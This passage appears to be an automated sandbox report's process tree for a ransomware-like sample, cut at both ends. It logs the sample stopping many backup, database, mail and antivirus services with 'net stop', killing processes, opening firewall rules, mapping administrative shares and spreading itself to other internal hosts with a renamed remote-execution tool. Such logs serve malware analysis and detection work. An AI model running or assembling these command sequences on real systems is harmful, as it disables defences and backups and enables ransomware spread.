      C:\Windows\system32\net1 stop McTaskManager /y
      4⤵
      PID:6048
- - C:\Windows\system32\net.exe
    "net.exe" stop sms_site_sql_backup /y
    3⤵
    PID:3956
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sms_site_sql_backup /y
      4⤵
      PID:4604
- - C:\Windows\system32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:5808
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:4652
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos AutoUpdate Service” /y
    3⤵
    PID:5608
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
      4⤵
      PID:1684
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop swi_service /y
        5⤵
        
        PID:3044
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:4264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:6176
- - C:\Windows\system32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:6132
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:540
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:5012
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
      4⤵
      PID:4660
- - C:\Windows\system32\net.exe
    "net.exe" stop SamSs /y
    3⤵
    PID:5852
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SamSs /y
      4⤵
      PID:2604
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer /y
    3⤵
    PID:6472
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer /y
      4⤵
      PID:1328
- - C:\Windows\system32\net.exe
    "net.exe" stop OracleClientCache80 /y
    3⤵
    PID:4144
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:5500
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
      4⤵
      PID:3912
- - C:\Windows\system32\net.exe
    "net.exe" stop CASAD2DWebSvc /y
    3⤵
    PID:4788
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop CASAD2DWebSvc /y
      4⤵
      PID:5504
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SOPHOS /y
    3⤵
    PID:3164
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
      4⤵
      PID:4128
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQLsafe Backup Service” /y
    3⤵
    PID:1692
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
      4⤵
      PID:6020
- - C:\Windows\system32\net.exe
    "net.exe" stop msftesql$PROD /y
    3⤵
    PID:2704
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msftesql$PROD /y
      4⤵
      PID:4240
- - C:\Windows\system32\net.exe
    "net.exe" stop SepMasterService /y
    3⤵
    PID:3736
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SepMasterService /y
      4⤵
      PID:6044
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:4292
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
      4⤵
      PID:5456
- - C:\Windows\system32\net.exe
    "net.exe" stop SstpSvc /y
    3⤵
    PID:4168
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SstpSvc /y
      4⤵
      PID:5104
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer110 /y
    3⤵
    PID:4956
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer110 /y
      4⤵
      PID:5280
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:7016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
      4⤵
      PID:6628
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:4540
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeMTA /y
    3⤵
    PID:4476
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMTA /y
      4⤵
      PID:6944
- - C:\Windows\system32\net.exe
    "net.exe" stop POP3Svc /y
    3⤵
    PID:6552
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop POP3Svc /y
      4⤵
      PID:5604
- - C:\Windows\system32\net.exe
    "net.exe" stop sacsvr /y
    3⤵
    PID:4608
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sacsvr /y
      4⤵
      PID:5372
- - C:\Windows\system32\net.exe
    "net.exe" stop ShMonitor /y
    3⤵
    PID:4764
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ShMonitor /y
      4⤵
      PID:5676
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeMGMT /y
    3⤵
    PID:7064
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:5160
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Device Control Service” /y
    3⤵
    PID:6716
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
      4⤵
      PID:2332
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Clean Service” /y
    3⤵
    PID:6396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Clean Service” /y
      4⤵
      PID:5412
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:4888
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
      4⤵
      PID:6120
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PROD /y
    3⤵
    PID:6704
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROD /y
      4⤵
      PID:5952
- - C:\Windows\system32\net.exe
    "net.exe" stop SMTPSvc /y
    3⤵
    PID:700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SMTPSvc /y
      4⤵
      PID:6428
- - C:\Windows\system32\net.exe
    "net.exe" stop SAVAdminService /y
    3⤵
    PID:6664
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SAVAdminService /y
      4⤵
      PID:1680
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$CXDB /y
    3⤵
    PID:4696
- - C:\Windows\system32\net.exe
    "net.exe" stop “Symantec System Recovery” /y
    3⤵
    PID:6824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Symantec System Recovery” /y
      4⤵
      PID:5640
- - C:\Windows\system32\net.exe
    "net.exe" stop Smcinst /y
    3⤵
    PID:7120
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Smcinst /y
      4⤵
      PID:3672
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:6988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:5616
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$SQL_2008 /y
    3⤵
    PID:4252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
      4⤵
      PID:4948
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$ECWDB2 /y
    3⤵
    PID:6420
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
      4⤵
      PID:5064
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:7036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
      4⤵
      PID:6452
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQLsafe Filter Service” /y
    3⤵
    PID:5016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
      4⤵
      PID:4172
- - C:\Windows\system32\net.exe
    "net.exe" stop SAVService /y
    3⤵
    PID:6172
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SAVService /y
      4⤵
      PID:5208
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:6516
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$TPSAMA /y
    3⤵
    PID:4560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
      4⤵
      PID:6064
- - C:\Windows\system32\net.exe
    "net.exe" stop SmcService /y
    3⤵
    PID:1036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SmcService /y
      4⤵
      PID:256
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeSA /y
    3⤵
    PID:264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA /y
      4⤵
      PID:5428
- - C:\Windows\system32\net.exe
    "net.exe" stop UI0Detect /y
    3⤵
    PID:5712
- - C:\Windows\system32\net.exe
    "net.exe" stop “Zoolz 2 Service” /y
    3⤵
    PID:4396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
      4⤵
      PID:3300
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:6320
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
      4⤵
      PID:5484
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos File Scanner Service” /y
    3⤵
    PID:5212
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
      4⤵
      PID:6156
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:6772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
      4⤵
      PID:7116
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$TPS /y
    3⤵
    PID:5520
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_filter /y
    3⤵
    PID:2692
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4552
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_filter /y
      4⤵
      PID:5972
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$TPS /y
    3⤵
    PID:4772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPS /y
      4⤵
      PID:6632
- - C:\Windows\system32\net.exe
    "net.exe" stop SntpService /y
    3⤵
    PID:4920
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SntpService /y
      4⤵
      PID:5668
- - C:\Windows\system32\net.exe
    "net.exe" stop “aphidmonitorservice” /y
    3⤵
    PID:5324
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “aphidmonitorservice” /y
      4⤵
      PID:4420
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$TPS /y
    3⤵
    PID:5776
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPS /y
      4⤵
      PID:7112
- - C:\Windows\system32\net.exe
    "net.exe" stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:5764
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
      4⤵
      PID:5832
- - C:\Windows\system32\net.exe
    "net.exe" stop msexchangeadtopology /y
    3⤵
    PID:5904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msexchangeadtopology /y
      4⤵
      PID:3200
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:5744
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
      4⤵
      PID:4328
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:4424
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
      4⤵
      PID:1176
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$TPSAMA /y
    3⤵
    PID:3196
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
      4⤵
      PID:4436
- - C:\Windows\system32\net.exe
    "net.exe" stop sophossps /y
    3⤵
    PID:1264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sophossps /y
      4⤵
      PID:5348
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_service /y
    3⤵
    PID:1684
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos MCS Agent” /y
    3⤵
    PID:4200
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
      4⤵
      PID:4680
- - C:\Windows\system32\net.exe
    "net.exe" stop W3Svc /y
    3⤵
    PID:4316
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop W3Svc /y
      4⤵
      PID:1424
- - C:\Windows\system32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:4616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2504
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SQL_2008 /y
    3⤵
    PID:4508
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
      4⤵
      PID:4912
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_update /y
    3⤵
    PID:4872
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update /y
      4⤵
      PID:5624
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeSRS /y
    3⤵
    PID:5008
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSRS /y
      4⤵
      PID:6488
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$TPSAMA /y
    3⤵
    PID:6044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
      4⤵
      PID:6684
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SOPHOS /y
    3⤵
    PID:4256
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
      4⤵
      PID:4116
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:5096
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:6968
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Health Service” /y
    3⤵
    PID:5220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Health Service” /y
      4⤵
      PID:6800
- - C:\Windows\system32\net.exe
    "net.exe" stop “intel(r) proset monitoring service” /y
    3⤵
    PID:6648
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
      4⤵
      PID:5708
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$ECWDB2 /y
    3⤵
    PID:2292
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
      4⤵
      PID:4808
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:6476
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
      4⤵
      PID:6840
- - C:\Windows\system32\net.exe
    "net.exe" stop msexchangeimap4 /y
    3⤵
    PID:4840
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msexchangeimap4 /y
      4⤵
      PID:3740
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_update_64 /y
    3⤵
    PID:4784
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update_64 /y
      4⤵
      PID:836
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos MCS Client” /y
    3⤵
    PID:6528
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Client” /y
      4⤵
      PID:5736
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:5856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
      4⤵
      PID:5316
- - C:\Windows\system32\net.exe
    "net.exe" stop svcGenericHost /y
    3⤵
    PID:2544
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLTELEMETRY /y
    3⤵
    PID:5752
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY /y
      4⤵
      PID:6744
- - C:\Windows\system32\net.exe
    "net.exe" stop ARSM /y
    3⤵
    PID:6428
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      4⤵
      PID:2632
- - C:\Windows\system32\net.exe
    "net.exe" stop TmCCSF /y
    3⤵
    PID:6680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TmCCSF /y
      4⤵
      PID:5848
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKeyServiceHelper /y
    3⤵
    PID:6508
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
      4⤵
      PID:2248
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$BKUPEXEC /y
    3⤵
    PID:5036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
      4⤵
      PID:4456
- - C:\Windows\system32\net.exe
    "net.exe" stop audioendpointbuilder /y
    3⤵
    PID:4884
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLBrowser /y
    3⤵
    PID:6728
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser /y
      4⤵
      PID:5464
- - C:\Windows\system32\net.exe
    "net.exe" stop unistoresvc_1af40a /y
    3⤵
    PID:4948
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop unistoresvc_1af40a /y
      4⤵
      PID:276
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:5052
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
      4⤵
      PID:5420
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Message Router” /y
    3⤵
    PID:5468
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Message Router” /y
      4⤵
      PID:5760
- - C:\Windows\system32\net.exe
    "net.exe" stop WRSVC /y
    3⤵
    PID:5844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop WRSVC /y
      4⤵
      PID:6668
- - C:\Windows\system32\net.exe
    "net.exe" stop tmlisten /y
    3⤵
    PID:5488
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop tmlisten /y
      4⤵
      PID:6776
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLSafeOLRService /y
    3⤵
    PID:6916
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSafeOLRService /y
      4⤵
      PID:5428
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:5680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:2004
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:6080
- - C:\Windows\system32\net.exe
    "net.exe" stop mssql$vim_sqlexp /y
    3⤵
    PID:4760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
      4⤵
      PID:6212
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /
    3⤵
    PID:5984
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
      4⤵
      PID:4416
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKey /y
    3⤵
    PID:6448
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKey /y
      4⤵
      PID:4820
- - C:\Windows\system32\net.exe
    "net.exe" stop vapiendpoint /y
    3⤵
    PID:4972
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop vapiendpoint /y
      4⤵
      PID:5080
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /y
    3⤵
    PID:6868
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
      4⤵
      PID:4572
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLSERVERAGENT /y
    3⤵
    PID:5672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSERVERAGENT /y
      4⤵
      PID:5724
- - C:\Windows\system32\net.exe
    "net.exe" stop AVP /y
    3⤵
    PID:4748
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AVP /y
      4⤵
      PID:1044
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:3816
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKeyScheduler /y
    3⤵
    PID:5060
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyScheduler /y
      4⤵
      PID:7100
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:4860
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:5440
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SHAREPOINT /y
    3⤵
    PID:7156
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
      4⤵
      PID:6364
- - C:\Windows\system32\net.exe
    "net.exe" stop DCAgent /y
    3⤵
    PID:2352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DCAgent /y
      4⤵
      PID:4776
- - C:\Windows\TEMP\uwtg55hs.exe
    "C:\Windows\TEMP\uwtg55hs.exe" \\10.10.0.33 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:2956
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Safestore Service” /y
    3⤵
    PID:4396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
      4⤵
      PID:4292
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:6664
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:6320
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:5016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:4772
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos System Protection Service” /y
    3⤵
    PID:7120
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
      4⤵
      PID:5212
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecDeviceMediaService /y
    3⤵
    PID:4440
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
      4⤵
      PID:6644
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:3912
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:4156
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Web Control Service” /y
    3⤵
    PID:5508
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
      4⤵
      PID:5264
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:2680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:5900
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PROD /y
    3⤵
    PID:792
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROD /y
      4⤵
      PID:284
- - C:\Windows\system32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:4264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:6128
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:6020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:7148
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:1020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:4136
- - C:\Windows\system32\net.exe
    "net.exe" stop Antivirus /y
    3⤵
    PID:4480
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Antivirus /y
      4⤵
      PID:1296
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Users
    3⤵
    PID:6684
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:6832
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:7076
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:5280
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\A$
    3⤵
    PID:6032
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\B$
    3⤵
    PID:4716
- - C:\Windows\TEMP\uwtg55hs.exe
    "C:\Windows\TEMP\uwtg55hs.exe" \\10.10.0.14 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:6264
- - C:\Windows\TEMP\uwtg55hs.exe
    "C:\Windows\TEMP\uwtg55hs.exe" \\10.10.0.27 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:6808
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\C$
    3⤵
    PID:6304
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:5128
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\D$
    3⤵
    PID:5160
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\E$
    3⤵
    PID:7144
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:6496
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\F$
    3⤵
    PID:7096
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\Users
    3⤵
    PID:1708
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\G$
    3⤵
    PID:6568
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    PID:4968
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\A$
    3⤵
    PID:6848
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\H$
    3⤵
    PID:280
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\B$
    3⤵
    PID:6612
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\I$
    3⤵
    PID:5756
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:6884
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\J$
    3⤵
    PID:6764
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\C$
    3⤵
    PID:5464
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:3120
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\K$
    3⤵
    PID:1292
- - C:\Windows\TEMP\uwtg55hs.exe
